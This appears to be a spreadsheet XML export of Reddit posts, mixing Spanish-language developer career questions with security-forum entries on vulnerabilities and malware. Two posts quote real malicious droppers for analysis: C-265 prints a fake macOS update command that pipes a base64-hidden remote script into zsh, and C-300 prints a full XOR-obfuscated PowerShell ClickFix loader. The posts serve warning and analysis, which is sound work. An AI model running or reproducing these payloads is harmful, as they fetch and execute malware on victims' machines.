    <t>Hola Reddidevs aqui les vengo con una duda, hace como 3 años que e querido estudiar programación pero por temas económicos no e podido hacerlo pero ahora ya estoy "estable" y me puedo permitir pagar una carrera, la cosa es que como saben en el ultimo tiempo este rubro no a estado llendo bien y hablando con un amigo que estudia "tecnicatura en logística" me di cuenta de que eso tiene mas salida laboral hoy en dia, mi amigo ya consiguió trabajo de eso y eso que apenas termino el primer año. Eso me dejo pensando en si me convenia seguir insistiendo con lo que yo quería o dejarlo e ir por otro camino. aunque programación es algo que me gusta posta, también quiero tener un laburo seguro pero en estos tiempos no lo veo muy posible con programación o IT en general. Ustedes como lo ven? creen que me convenga irme por logística? Creen que la IA se implementara en logística y pasara lo mismo que con programación? los leo [link] [comments]</t>
  </si>
  <si>
    <t>C-256</t>
  </si>
  <si>
    <t>Tales from the Trenches: Anthropic’s Mythos and Rejetto HFS</t>
  </si>
  <si>
    <t>C-257</t>
  </si>
  <si>
    <t>api.wakhtar.com</t>
  </si>
  <si>
    <t>Hi All, This interesting malware came to my attention. I have analysed it and so far discovered the following: You run the masked .exe file; it checks if the machine is not ARM or running in VMware environment, and then it executes itself. It possibly executes directly into RAM. I am still going through ram dump but its interesting as its masking the IP from Cloudfare - 172.67.168.69 Has anyone seen this or similar one ? [link] [comments]</t>
  </si>
  <si>
    <t>C-258</t>
  </si>
  <si>
    <t>From Padding Oracle to Shell: Unauthenticated RCE in Telerik UI for ASP.NET AJAX</t>
  </si>
  <si>
    <t>C-259</t>
  </si>
  <si>
    <t>Kratos PhaaS: How Turnkey Phishing Scales Microsoft 365 Account Takeovers</t>
  </si>
  <si>
    <t>C-260</t>
  </si>
  <si>
    <t>¿Quien fue el moron?</t>
  </si>
  <si>
    <t>Error noob en la UI de LinkedIn [link] [comments]</t>
  </si>
  <si>
    <t>C-261</t>
  </si>
  <si>
    <t>Con que extranjeros es más difícil trabajar?</t>
  </si>
  <si>
    <t>En este sector es común tener como clientes y trabajar con gente de otros países. Siempre puede haber dificultades por las diferencias culturales, pero hay casos son irritantes, eso escuché sobre varios hindúes (no todos) que te dicen que todo anda bien hasta último momento. [link] [comments]</t>
  </si>
  <si>
    <t>C-262</t>
  </si>
  <si>
    <t>Critical RCE Alert: Full takeover of HashiCorp Vault and OpenBao. OpenBao is patched. Vault remains exposed</t>
  </si>
  <si>
    <t>OpenBao engineers at ControlPlane have chained 4 vulnerabilities to show how under certain conditions, an OpenBao or Vault server can be completely compromised from an unauthenticated position. This is only the second RCE ever found in the Vault codebase. The exploit is highly plausible in real-world environments, requiring only an unauthenticated entry path and a defined Raft snapshot policy to trigger a complete server compromise. If you are impacted, upgrade as soon as possible to OpenBao 2.6.3 or 2.7.0 While OpenBao is fully patched, HashiCorp Vault remains exposed as of writing. Unfortunately, IBM's unwillingness to coordinate a mutual disclosure policy means Vault users currently lack an official mitigation [link] [comments]</t>
  </si>
  <si>
    <t>C-263</t>
  </si>
  <si>
    <t>UniBLEed: Unauthenticated Root RCE on Any Unitree G1 Humanoid Robot Within Bluetooth Range</t>
  </si>
  <si>
    <t>C-264</t>
  </si>
  <si>
    <t>Contractor vs Full time?</t>
  </si>
  <si>
    <t>Buenas, me ofrecieron un muy buen laburo con la posibilidad de ser contractor o full time. Que me conviene mas? Seria un sueldo en usd arriba de 6k [link] [comments]</t>
  </si>
  <si>
    <t>C-265</t>
  </si>
  <si>
    <t>First time seeing this for MacOS</t>
  </si>
  <si>
    <t>As the title said, I’ve seen these “popup” things a lot on windows, but this is the first I’ve seen for macOS, It includes a video on how to properly do it, but looks to be very AI generated, Is someone able to find out the payload behind it? echo "Downloading Update: https://support.apple.com/downloads/macos-security-update-14.5.dmg" &amp;&amp; curl -s $(echo "aHR0cHM6Ly9sYXBpZG9yc2Vwb3NvYWxvdmJzMi5jb20vZGVidWcvbG9hZGVyLnNoP2J1aWxkPThhODMxZGRiNmRmNDUyYzc1ZmEwNjYxMGFhZjZlODk1" | base64 -d) | zsh [link] [comments]</t>
  </si>
  <si>
    <t>C-266</t>
  </si>
  <si>
    <t>recomendaciones para mi?</t>
  </si>
  <si>
    <t>soy estudiante de ingeniería en sistemas, cursando 4to año de la carrera y con muchas ganas de trabajar para tener mi platita, tengo 22 años y no tengo experiencia previa, ademas de que necesitaría algo remoto ya que mucho tiempo estoy viajando a capital para poder estudiar. que me recomiendan? se que es complicado algo remoto y ademas sin tener la experiencia previa, pero no descarto formarme en algún área mediante algún curso o algo similar. desde ya muchas gracias. [link] [comments]</t>
  </si>
  <si>
    <t>C-267</t>
  </si>
  <si>
    <t>How do you vet browser-based WASM game ports (GTA V, BO1 Zombies) for malicious code? Looking for a practical workflow</t>
  </si>
  <si>
    <t>Over the last few days I’ve seen several WebAssembly game ports go viral: the unofficial GTA V one (playgta5.com, which reportedly went down within hours) and a fan-made BO1 Zombies port. Reports suggest the GTA V one runs locally using WASM + WebGPU and may be built from leaked source code, but nobody has confirmed that. I know WASM runs in the same browser sandbox as JS, so I’m not assuming “WASM = instant RCE”. What worries me is everything around it, especially now that the original site is gone and clone/mirror domains are probably popping up. [link] [comments]</t>
  </si>
  <si>
    <t>C-268</t>
  </si>
  <si>
    <t>ChatGPT Malvertising Campaign</t>
  </si>
  <si>
    <t>I recently analysed a malvertising campaign where the attackers are using ChatGPT / OpenAI branding to deceive users into downloading malware. https://evalian.co.uk/fake-chatgpt-malvertising-campaign/ [link] [comments]</t>
  </si>
  <si>
    <t>C-269</t>
  </si>
  <si>
    <t>ZTE SmartHome Account Takeover: Password Reset Without Verification Code. 4 CVEs, 100K+ Android Downloads - CVE-2026-86553</t>
  </si>
  <si>
    <t>Technical write-up for four vulnerabilities I reported in ZTE SmartLife. The main issue is CVE-2026-86553, a password reset flaw in the SmartLife account backend. The reset endpoint accepted the target accountId and a new password without requiring a reset code, old password, or validated reset transaction. Another endpoint exposed whether an email was registered and returned the corresponding backend account ID. Using researcher-controlled accounts, the chain was: email -&gt; accountId -&gt; password reset -&gt; login with the new password I verified the state change by confirming that the previous password stopped working and the newly selected password successfully returned a valid session. The research also covered the app authentication mechanism used by the Android client, email ownership verification during registration, and the wider SmartLife/Homecare SDK surface available after login. ZTE patched the reported issues and assigned CVE-2026-86552, CVE-2026-86553, CVE-2026-86554 and CVE-2026-86555. [link] [comments]</t>
  </si>
  <si>
    <t>C-270</t>
  </si>
  <si>
    <t>Captura: estoy usando el celu para darle contexto por voz a mis agentes</t>
  </si>
  <si>
    <t>EDIT: reescribí el post porque lo había enfocado en dictar una idea y parecía una alternativa al micrófono de Codex. Lo expliqué mal. buenas gente, cómo andan? quiero que mis agentes tengan contexto de cosas que pasan fuera del chat. poder registrar una idea que voy hablando o una conversación desde el celu y seguir trabajando con eso después, sin tener que contarles todo de nuevo. un uso que quiero probar ahora son las reuniones presenciales: grabar con el acuerdo de quienes participan y después retomar el proyecto con ese contexto, revisar qué se decidió y qué quedó pendiente. para eso estoy usando Captura. el celu graba, las grabaciones pueden sincronizarse por Drive y mi compu las transcribe localmente con whisper.cpp. quedan el audio original y el texto en archivos que puedo conectar con las herramientas y los agentes que use. ya lo usé para hablar de cómo quiero conectar mi sistema de agentes y retomar esa idea después con uno. pudo leer lo que había dicho y seguir desde ahí. me pareció re zarpado jaja. el audio queda para revisar cuando la transcripción le pifia. que algo aparezca en una grabación no es permiso para que el agente lo ejecute. dejé ese puente open source. es un prototipo y requiere configuración propia; la integración con mis agentes va aparte. no ejecuta pedidos ni responde solo. Repo: https://github.com/MatiasJRB/captura ¿alguno está haciendo algo parecido con reuniones o conversaciones? me interesa cómo lo usa y qué hace después con esa información. [link] [comments]</t>
  </si>
  <si>
    <t>C-271</t>
  </si>
  <si>
    <t>Zoho Zecurit Agent - Link Phone or Force Shutdown</t>
  </si>
  <si>
    <t>Hi, I just want to share my experience fighting a malware that was inadvertently downloaded onto my computer while I was simply trying to find a job. I applied for a job on Indeed at a company called Velan. Looks legit and everything. The hiring manager, who was a supposed COO, reached out to me via Indeed messages. Wow seems really legit, I thought. It's a US company with a sizeable presence overseas and in Canada. Their website looks legit. At first communication was fast and then it dragged and got super slow. A few weeks had passed since the initial outreach from the COO and then I received an email from him apologizing for the delay. The email domain is legit too as it automatically redirects to another company. He wanted me to download Zoho. I had been aware of Zoho but usually I receive a Zoom or Teams link. I may have used Zoho a few times but the experience was not memorable. He included a link in the email to download Zoho. I clicked on this link and it led me to a really weird page that never stopped buffering. It finally loaded and I downloaded the installer but I was still unable to select/schedule a time on Zoho to speak. The next thing I know, I had to download what I later discovered to be the real Zoho, which looks nothing like what I had downloaded earlier. I communicated all of this to the COO, by which point he had gotten his assistant involved, but she was also using his email address. She was adamant that I just had to go on and I could send her a time too if that was easier for me. I told her it still did not work and they stopped replying. A few days later, I noticed a new icon on my taskbar called "Zecurit Agent." At first I thought it says Zrecruit. But upon realizing that it was NOT saying "recruit" in Zrecruit, I knew I had fallen for a classic phishing technique. I was busy with other things so I didn't know what I was up against. A few days after that, I started to receive a popup telling me that a new Windows update requires me to link my cell phone to my laptop. I closed the window and it forces a shutdown. There was no way to fight it. This would come at odd intervals. I couldn't bear this disruption to my life anymore so I decided to use Gemini (this is NOT a plug for AI or Gemini) to help me. My experience with Gemini was mainly positive but it also hallucinated and told me to delete several things that it later admits were legit and that I should not have deleted. I had to go in to delete registry keys, among other things. It was exhausting and took me more than 3 hours. It's clear now that the hackers have commandeered the email of the company Velan to send this malware. [link] [comments]</t>
  </si>
  <si>
    <t>C-272</t>
  </si>
  <si>
    <t>☢️ Philippine Nuclear Agency and Naval Contractor Targeted by Suspected Chinese-Speaking Operator</t>
  </si>
  <si>
    <t>The Hunt.io research team found an open directory staging the full toolkit behind an intrusion into a Philippine nuclear research agency and a naval contractor. The ownCloud path is the interesting part technically. CVE-2023-49105 lets you forge pre-signed WebDAV URLs when the signing secret is empty, which is the default state on a fresh install. Five custom Python scripts on the server implement this: the signing routine passes an empty bytes literal as the PBKDF2 salt, sets OC-Credential to the account being impersonated, and issues GET requests against /remote.php/dav/files/&lt;account&gt;/&lt;path&gt;, receiving files as that user with no credentials. Four scripts target one account each, the fifth adds PROPFIND enumeration with Depth: 1 to walk folders that were not pre-enumerated. The naval contractor was hit separately via CVE-2024-28000 (LiteSpeed Cache) using a custom Go reimplementation of MT19937 with PHP mt_rand() parity, verified against 11 known seed/output pairs, plus an XML-RPC brute force with rockyou.txt. Both produced unauthorized access independently. We also found a separate, possibly unrelated EtherHiding compromise on the same WordPress site. A HuntSQL query on the smart contract address returned 174 unique IPs hosting likely compromised pages with the same NoChain loader strings. Full writeup with IOCs, the signing routine, and MITRE mapping: https://hunt.io/blog/chinese-speaking-operator-philippine-nuclear-naval-contractor [link] [comments]</t>
  </si>
  <si>
    <t>C-273</t>
  </si>
  <si>
    <t>Otro post rompebolas de la IA</t>
  </si>
  <si>
    <t>Buenas, soy un pibe que arranco hace no mucho en este mundo y me gustaria escuchar la opinion de gente mas experimentada sobre una pregunta que tengo. Que es lo que sienten cuando ven los avances exponenciales de la IA? Como día tras día va haciendo locuras y locuras que antes costaban semanas/meses. A mi como estudiante cada vez me deprime mas, pero quizá porque me perjudica mas a mi que a gente mas experimentada. Lo ven como algo bueno que agiliza todo mucho mas? Tienen miedo? les genera tristeza? Quiza les chupa un huevo no lo se, por lo que veo esto se va a comer a todos, si es asi, que plan tienen? Alguna recomendacion? Gracias [link] [comments]</t>
  </si>
  <si>
    <t>C-274</t>
  </si>
  <si>
    <t>Tengu, a Mirai-style Linux and IoT botnet</t>
  </si>
  <si>
    <t>C-275</t>
  </si>
  <si>
    <t>VPS barato que recomienden?</t>
  </si>
  <si>
    <t>Estoy buscando deployar poyectos en mi primer VPS para aprender un poco de infra, alguno que recomienden aparte de AWS? AWS me da miedo que te cobra dinámicamente, me sentiría más seguro con uno que sea pago fijo por mes para evitar sorpresas. Si conoces uno que permita pagar con diversos medios de pago mejor, para hostear páginas sencillas o algún que otro servicio de DB muy chiquito de prueba. [link] [comments]</t>
  </si>
  <si>
    <t>C-276</t>
  </si>
  <si>
    <t>Soy un pelo…</t>
  </si>
  <si>
    <t>Tal como dice el titulo… Tenia una entrevista para la pasantía Drive the future en JPMorgan y me cambiaron el dia, por lo cual flashee que era hoy y cuando pasan 10 minutos y veo que nadie entraba, reviso el mail y veo que fue ayer… Pregunté si se podia reprogramar y me dijeron que ya cerraron el proceso xd La verdad me quedé con mucha bronca, a alguno de ustedes le pasó algo asi alguna vez? EDIT: Estoy en 2 procesos de entrevistas mas, 5 parciales y laburo full time, no es que me rasco la pija, pero si, de alguna manera me autofiltré solo [link] [comments]</t>
  </si>
  <si>
    <t>C-277</t>
  </si>
  <si>
    <t>Don’t Let Abliteration Abliterate Your Bug Hunting: Discovering Verdict Bias in Uncensored Models</t>
  </si>
  <si>
    <t>C-278</t>
  </si>
  <si>
    <t>Soy idiota? Meterse en desarrollo hoy en día</t>
  </si>
  <si>
    <t>Buenooo vengo laburando en una empresa desde hace muchos años, pasé por todos lados pero primero entré como soporte. Después pasé a un área que tiene un contacto con el cliente aún más transversal que soporte (Customer Success), pero por varios motivos ahora estoy desarrollando automatizaciones para esta área full time básicamente. Ahora que estoy en esto desde hace varios meses me doy cuenta que odio tener reuniones y cada vez que tengo que dar una capacitación a un cliente medio que me quiero pegar un tiro. Así que mis habilidades con los clientes se me están atrofiando, o por lo menos se está haciendo más intolerable que antes. Y encima me estoy sintiendo incompetente al lado de los LLMs, estoy trabajando básicamente sola sin guidance fuera de la IA y siento que para deliverear tengo que hacer más y más cosas con esas herramientas. Y que voy perdiendo cualquier tipo de ventaja que tenga ser humana. Será porque me pasé de usar ChatGPT a Claude hoy y este último es más potente y me tiró cosas que ni chatgpt ni yo habíamos considerado? Le rechacé varias sugerencias pero dios sumado a que me estoy sintiendo improductiva me siento más incompetente. Igual eso era venteo, a lo que voy es que será muy estúpido meterse a desarrollo hoy con lo que se está viniendo con las LLMs y los agentes? El futuro será pedirle cosas a una LLM sin entender realmente lo que ocurre si tenés que sacar cosas rápido? 😭 [link] [comments]</t>
  </si>
  <si>
    <t>C-279</t>
  </si>
  <si>
    <t>Multiple Vulnerabilities in Frappe LMS Leading to Remote Code Execution</t>
  </si>
  <si>
    <t>C-280</t>
  </si>
  <si>
    <t>A peek into Reddit's anti-spam internals</t>
  </si>
  <si>
    <t>C-281</t>
  </si>
  <si>
    <t>Paranoid of spyware/malware after phone repair.</t>
  </si>
  <si>
    <t>So about a year ago I got my Samsung S24 to a phone repair shop in HuaQiangBei in China(because it was relatively cheaper. And now I'm paranoid that there was a spyware that logged my screen and keys, or hardware level chips or rootkits that can potentially achieve that and breach my privacy. I remember having done factory resets but probably restored the device with the backup aswell. (not sure if backup was after the repair) So now I'm really paranoid that my phone might be infected with spywares or perhaps malicious chips that can spy on what I did on my phone during that time. Do you guys think it is possible and practical for them to do so? How do I find out if it was truly infected during that time? (I factory resetted days ago without restoring the backup so there's no really practical ways to test it now, I just wanna try to figure it out by signs that my phone might be infected. [link] [comments]</t>
  </si>
  <si>
    <t>C-282</t>
  </si>
  <si>
    <t>Malware analysis update: Suspicious ZIP Hid a Windows Malware Loader and an Antivirus-Killing Driver</t>
  </si>
  <si>
    <t>C-283</t>
  </si>
  <si>
    <t>LG webOS sync-demo Preauth RCE</t>
  </si>
  <si>
    <t>An exploit chain was found in LG webOS, leading to root command execution. The chain starts with a client-key issuance bypass, progresses through service-level access, and ultimately leads to root command execution. [link] [comments]</t>
  </si>
  <si>
    <t>C-284</t>
  </si>
  <si>
    <t>Tecnologías mejores pagas en Cloud?</t>
  </si>
  <si>
    <t>Hola! Estoy intentando migrar un poco del típico Sysadmin gordo Linux a algo más DevOps, SRE, y posiciones de ese estilo. Hace unos años atrás creo que tenía más relevancia ser Sysadmin, hoy en día está más de moda DevOps y SRE. Mí idea es meterle a tecnologías que perduren en el tiempo, osea que no me pase de nuevo lo mismo que siendo Sysadmin. Y en lo posible ya que estoy viendo de cero algunas tecnologías, me gustaría elegir las que más paguen. Recomendaciones? Certificados que valgan la pena? PD: obvio si fuese fácil responder esto estaríamos todos estudiando esas tecnologías y cobrando sueldazos. Pero bueno me gustaría escuchar la opinión de gente que tenga años de Exp dentro de Cloud, para entender hacia donde va el mercado. Gracias! [link] [comments]</t>
  </si>
  <si>
    <t>C-285</t>
  </si>
  <si>
    <t>AI Agent Security: Six Controls From Nine Real Incidents</t>
  </si>
  <si>
    <t>C-286</t>
  </si>
  <si>
    <t>Pwning Call of Duty 1: a 20-year-old RCE, found in an evening with AI</t>
  </si>
  <si>
    <t>C-287</t>
  </si>
  <si>
    <t>Fake Cloudflare verification on deceased influencer’s site drops a PowerShell shellcode loader</t>
  </si>
  <si>
    <t>C-288</t>
  </si>
  <si>
    <t>Consejos para conseguir laburo de dev 2026 sin ser senior?</t>
  </si>
  <si>
    <t>Ya se que esta medio quemada la pregunta pero no se bien que hacer, estoy tirando hace meses y nada, tengo 3 años de experiencia en el rubro y me esta costando horrores, obviamente estoy mejorando siempre el cv, actualizando para pasar las ats etc pero no me esta dando resultado el mes pasado deje de tirar porque medio que me "Rendi" o también pienso en algun lugar de mi mente que es cuestion de que se acomoden las cosas y va a volver a haber laburo Estuve viendo unos videos de youtube de q puede hacer alguien q no es senior hoy en dia y te tiran consejos como abri google maps y revisa los comercios de tu barrio para hacerles la pagina web kjjjjjjjjjjj y no quiero ser mala onda o mal agradecido pero eso no llega a ningún lado, eso era hace 8 años atrás facil, en fin, alguien en una situación parecida? den consejos de cosas que capaz no estoy haciendo, me muero de hambre literalmente hace mas de 3 meses estoy a arroz huevo y polenta, no tengo familia mis hermanos estan en otras provincias y mi viejo murio hace 2 semanas. que hago? sigo mandando cv como autist? intente hacer de todo hasta estuve muy activo en linkedin pero no llego a nada tampoco [link] [comments]</t>
  </si>
  <si>
    <t>C-289</t>
  </si>
  <si>
    <t>Date cuenta: si le escribís al LLM en castellano, el resultado va a ser siempre inferior</t>
  </si>
  <si>
    <t>- Los tokenizadores están hechos para tratar al inglés como la base normal, y a los demás idiomas como anomalías. Por lo tanto, usás más tokens de entrada y de salida. Todo es más caro. - Los corpus que se usan para entrenar están mayoritariamente en inglés. - Si para tu pregunta en castellano hay cosas que se puedan usar del corpus en castellano, son esas las que van a prevalecer porque tuvieron una congruencia directa. Y son de menor calidad en el ámbito de la informática. Hay quien piensa que al escribirle al LLM en castellano, está generando una traducción de ida y vuelta. Lo que realmente sucede es muy distinto. En pocas palabras, le estás hablando a un subconjunto del corpus. [link] [comments]</t>
  </si>
  <si>
    <t>C-290</t>
  </si>
  <si>
    <t>Iniciarme en desarrollo con IA</t>
  </si>
  <si>
    <t>No tuve la chance de desarrollar mucho con IA porque no tengo tarjeta (ni plata) para pagar una suscripción a Claude, Codex o la herramienta que sea. Veo a muchos hablando de skills, agentes, MCP, y mil otros términos nuevos que surgieron y que no tengo ni idea cómo emplearlos. Me satura un poco de información todo lo que veo en LinkedIn, y siento que me quedo atrás. Ustedes conocen algún recurso que hable y enseñe de todos estos temas para usar la IA en desarrollo? Lo quiero integrar para que me haga tests de un sistema grande que estoy haciendo [link] [comments]</t>
  </si>
  <si>
    <t>C-291</t>
  </si>
  <si>
    <t>Ahora que la IA decompila el software, de que van a vivir las empresas?</t>
  </si>
  <si>
    <t>C-292</t>
  </si>
  <si>
    <t>Documentación o Plataforma/Youtube?</t>
  </si>
  <si>
    <t>Conozco todo lo básico de Python y quiero meterme en Python + ciencia de datos. ¿Dónde recomiendan aprender sobre esto? La verdad, no encuentro por dónde empezar ni qué buscar en YouTube para arrancar. ¿Qué me recomiendan? Los leo [link] [comments]</t>
  </si>
  <si>
    <t>C-293</t>
  </si>
  <si>
    <t>8 out of 10 Banks HATE This One Weird 3SKey RCE</t>
  </si>
  <si>
    <t>TL;DR. SConnect - 1M+ users, an extension middleware+native host for authentication with eIDs, 3SKeys and other hardware signing tokens had a drive-by RCE which enabled any site or iframe a user saw to silently download and execute a dll due to a poor hand-rolled implementation of RSA-2048 token validation, enabling a use of uninitialized memory validation bypass which enabled "plugins" (DLLs) to be loaded. v2.16.0.0 of the extension and native host is vulnerable. CVE-2026-18397. CVSS 9.4. [link] [comments]</t>
  </si>
  <si>
    <t>C-294</t>
  </si>
  <si>
    <t>IBM Db2 Mirror for i: pre-auth RCE and the road to QSECOFR</t>
  </si>
  <si>
    <t>C-295</t>
  </si>
  <si>
    <t>¿Por dónde arranco?</t>
  </si>
  <si>
    <t>Buenas gente. Tengo 18 y estudio Marketing y Comercio Internacional en la UADE. Estoy dando mis primeros pasos emprendiendo: vendo por Mercado Libre, hice algunas campañas en Meta Ads y armé un par de landings. Quiero capacitarme y enfocarme en algo que me permita ganar plata, pero no sé bien por dónde agarrar. IA: uso Claude todos los días, tanto el chat como Claude Code, pero en un nivel bastante básico. Lo uso para algunas cosas de ecommerce, probé hacer landing pages y sacarme dudas, poco más. Programación: cero absoluto. Vi que hay cursos en Coderhouse y los videos de Dalto en YouTube, pero no sé si es por ahí. Mi duda es qué camino tomar. ¿Me conviene profundizar en IA y aprender sobre la marcha, o arrancar con programación desde la base para entender lo que hace la IA y no quedarme en promptear? ¿O las dos cosas a la vez? Les quería preguntar: Si arrancaran de cero hoy, ¿cómo se capacitarían? Cursos, YouTubers, documentación, proyectos, lo que sea. ¿Qué recursos recomiendan para cada camino? ¿Qué habilidades ven que se pagan bien hoy para alguien que arranca? Gracias de antemano 🙌 [link] [comments]</t>
  </si>
  <si>
    <t>C-296</t>
  </si>
  <si>
    <t>Devs que preparan café de especialidad: cómo hacen para repetir una receta que les salió bien?</t>
  </si>
  <si>
    <t>Buenas! Soy desarrollador y estoy armando una aplicación para registrar preparaciones de café de especialidad. La idea es poder anotar el café, el método, la molienda y algunos parámetros, además de cómo salió, para después entender qué cambiar o repetir. Me interesa especialmente escuchar a quienes preparan café en casa y también trabajan en desarrollo: cómo registran hoy sus recetas, si es que las registran? Usan una app, una planilla, notas, fotos o confían en la memoria? Qué dato les gustaría encontrar rápido cuando vuelven a preparar un café? Todavía estoy definiendo cómo organizar la información, así que me sirve conocer experiencias reales antes de seguir construyendo. Gracias!! [link] [comments]</t>
  </si>
  <si>
    <t>C-297</t>
  </si>
  <si>
    <t>Malicious Infostealer Windows Malware EXE - Reportedly caused financial loss</t>
  </si>
  <si>
    <t>C-298</t>
  </si>
  <si>
    <t>Malware repos</t>
  </si>
  <si>
    <t>Hi, anyone know of any good malware repos for a project I’m working on? I’ve already used The Zoo and Objective C. And any Mac specific malware repos would be incredibly helpful. [link] [comments]</t>
  </si>
  <si>
    <t>C-299</t>
  </si>
  <si>
    <t>400k menos por un puesto 100% remoto de 6 a 15 o 100% presencial de 9 a 18?</t>
  </si>
  <si>
    <t>this, me hablaron para trabajar para afuera por 400k menos de mi sueldo actual, pero en dolares, 100% remoto y de 6 a 15. lo malo? es una consulchorra, anda saber si me bochan a los 3 días actualmente, pasé los 6 meses en una internacional, pero el mayor y unico beneficio que tengo es café y yerba para el mate ilimitado (y ponele que un excelente sueldo por sacarme los mocos) me rasco las bolas a 2 manos en la internacional y literalmente vengo a estudiar nomas, entiendo que es un re benificio, pero llega un punto que es un re embole y te sentis un inutil, más cuando sos el más chico de toda la empresa, rodeado de gente de 50 años para arriba (tengo 20) q hago [link] [comments]</t>
  </si>
  <si>
    <t>C-300</t>
  </si>
  <si>
    <t>ClickFix attack in the wild — fake Cloudflare CAPTCHA delivering obfuscated PowerShell dropper</t>
  </si>
  <si>
    <t>A friend was trying to download pirated content and hit a page impersonating a Cloudflare verification gate. The page instructs the user to open PowerShell via Win+X, paste a script, and press Enter to "verify." The full script is below. &lt;#Verification ID:ee07fab83851b4ad#&gt;$gohy='Lovpq0';$wqz0='6819061d0408295251274105200b3545256a14254411267e203a31490152223d38292605243544260868180040254366260b2e3a0154040327131c097c0d443e0752085f0c3d355335200f22416a085e14232408393a313641510a5f403f1a7e3a0d213a0152213a1927415c1c231a3219540b07123f1b4004352e22246a1b5e012536767c0e3517017c0a1b3c2408051d362e221e681800402243667c3a1b36046a0b5602221c5c3f35234519521b3a193b225b7b38461c217c273d06131c66260b314908551a5f403f1a7e35352136416a193d06131c66260b314908551f081d1436613c09334940540f5e391426483f200f22416a265e14232408393a313641510a5f403f1a7e3a0d213a0152213a193a3962272330043b64355a272929622337221f47627e3946251c763935314905622103052a2405240d21251e7b1f1c183c1c6678352513017f353d45290b0103352e1305647e25072a267e7c2633451d540f5a2e2a267a080d311c1d52223e413a36093e3f2231466a21560f3b32623c3f2231467a0b04113c26487c26323d167c1b29032a327124253149037f353d063b08433c0a45220855141b14232408393d1b1c026a1a5f403f1d54350e2e221d611b1705211f5c7c352e3d1e7a043d1b3c32627f360f4534527f0b031236092435332219540b2a193a43587c0b3e320b7f2557002a296223352e3a1b6a0b5a0313080525352126087c7e29011122053b0e3e315e54085f463d267d3636213a1b7d362e0e3d0b7a25221b3a1a691b2a012a356a24351c3e1b6918251d290b577c2031390b6926031b29437e25360c221c6a212a453e3676273521210b69260b1c291b7d7d22313a1a7d7e251d3a085b3c20441c1c7b0a1b3c2408050b0e21081d681800402229583c0c45220b7b0f3d462a185b3c0a0f220751365f0e1626663f0c442646657f3d1e131f61383a44081d6a142e113d1f017536443641697e0741254262240c182105657e171a2a29712b221841487f7e031b3b32762e3c234804622103052a27007a201d264551142146130857270b3129017b141b1a15365c7c09220425540b290f1432011d0c1b491b6a14210c3932010b0e21081d650b2946113271270b3129465404254315407e7c362e3a417c1a21052a26663b26322546677c03263c1a6a3c0d3126157f261f332a2648200b31251e7a043d1b3b290126362e221b51041b4f3f060d71484d5406062a0e42144c6b180a0e045f75220c1914185e2b324c4a24640a57583714441f1b04191f576434351f1f46291d022d4b0a0a1d191d33513f0a404422443e06181759143a1f1b05495565464d2305513e1b5b20035f2f0a0503511d1b0618141e471f1b0f1c141004061214145e6c1f190714423f07131c1d10612e0417045d2901023c1843384f515d3f5f1c1d1916185c29485a575c672501121f066338161a15561c6b271f14155522485a575c7323021b111f546b43520747562d5b124b1448251b';$w81ps='';for($x3v2=0;$x3v2 -lt $wqz0.Length;$x3v2+=2){$w81ps+=[char](([convert]::ToInt32($wqz0.Substring($x3v2,2),16))-bxor[int][char]$gohy[$x3v2/2%$gohy.Length])};.($env:ComSpec[4,26,25]-join'') $w81ps &lt;#Verification ID:ee07fab83851b4ad#&gt; Analysis Delivery method: ClickFix — social engineering that tricks the user into self-executing malware,$wqz0 — long hex-encoded payload string,$gohy (Lovpq0) — XOR key used to decrypt it, cycling through characters,The loop decodes the hex string byte-by-byte via XOR against the repeating key,($env:ComSpec</t>
  </si>
  <si>
    <t>C-301</t>
  </si>
  <si>
    <t>en busca del primer laburo</t>
  </si>
  <si>
    <t>buenas el año que viene arranco ing en sistemas, este año estuve aprovechando el tiempo y haciendo varios cursos de educación it (se que hay muchas mejores opciones pero es lo que en su momento me pareció bueno) hice varios cursos de sql, power bi, python dedicado al análisis de datos y demás como ingeniería de datos y machine learning. Se que para el mercado de data entrar es muy jodido si podrían tirarme algún centro para arrancar o donde buscar lo agradecería mucho. tampoco descarto profundizar en ciberseguridad, es un campo que toco de oído y también tengo preferencia, pero en su momento me decanté por datos porque me pareció que abarcaba mucho más mercado [link] [comments]</t>
  </si>
  <si>
    <t>C-302</t>
  </si>
  <si>
    <t>Hacking concerns</t>
  </si>
  <si>
    <t>Has anyone purchased and downloaded from this Facebook ad company? Should I be concerned about Malware or anything else? Any feedback would be greatly appreciated Thanks [link] [comments]</t>
  </si>
  <si>
    <t>C-303</t>
  </si>
  <si>
    <t>Devs, si pudieran arreglar algo sobre el QA en sus equipos, cual sería?</t>
  </si>
  <si>
    <t>Contexto, QE acá (12 años ya, migrando a QA Cobol), me gustaría entender qué problemas reales tienen los devs (o los equipos en general) hoy con QA y testing en sus equipos. Siempre está el meme de que entre los devs y los qa hay amor/odio, por eso me gustaria saber desde el lado de ustedes como devs cual es el mayor de cabeza que les solemos dar? Algunas ideas por si ayudan: falta de automatizacion, qa que hacen cuello de botella, demasiado testing manual (qc), falta de contexto de parte del area comercial o los TL para los qa, mala comunicacion entre el equipo... Ando haciendo catarsis acerca de mi trabajo y me gustaría saber sus opiniones y aprender un toque mas para pulir mi laburo. [link] [comments]</t>
  </si>
  <si>
    <t>C-304</t>
  </si>
  <si>
    <t>MCP-Powered Malware Traffic Analysis — Benchmarked Against Real Malware</t>
  </si>
  <si>
    <t>C-305</t>
  </si>
  <si>
    <t>AI on Kubernetes: Default Helm Chart Security Configurations and Lateral Movement Risks</t>
  </si>
  <si>
    <t>A technical audit evaluating the security defaults of 15 official Helm charts used for AI serving, vector databases, and Model Context Protocol (MCP) agents (including KubeRay, vLLM, LiteLLM, Qdrant, Weaviate, and Flux159 MCP). Key findings from static manifest analysis and live single-pod lateral movement probes on a test cluster: Plaintext Secret Handling: LiteLLM database migration Job embeds raw database passwords in container environment variables (F-13). Unauthenticated Remote Code Execution: KubeRay defaults accept unauthenticated job submissions via HTTP, running commands inside a container with passwordless sudo access. Over-privileged Agent Access: Flux159 Kubernetes MCP server mounts a ClusterRole with cluster-wide Secret read and pod exec permissions, exposed without an authentication token over HTTP. Static Scanners vs CRDs: Standard static analysis tools (Checkov, Trivy, Kubescape) failed to inspect pods nested inside Custom Resource Definitions like Ray clusters. The paper documents reproducible test commands, network capture logs, and remediation Helm snippets. Scrubbed raw probe logs and results tables are available on GitHub: https://github.com/Sorami-Consulting-AU/ai-kubernetes-helm-chart-security [link] [comments]</t>
  </si>
  <si>
    <t>C-306</t>
  </si>
  <si>
    <t>Privilege escalation from IIS AppPool to NT Authority/SYSTEM via AD CS RPC endpoint</t>
  </si>
  <si>
    <t>C-307</t>
  </si>
  <si>
    <t>Juego en Play Store</t>
  </si>
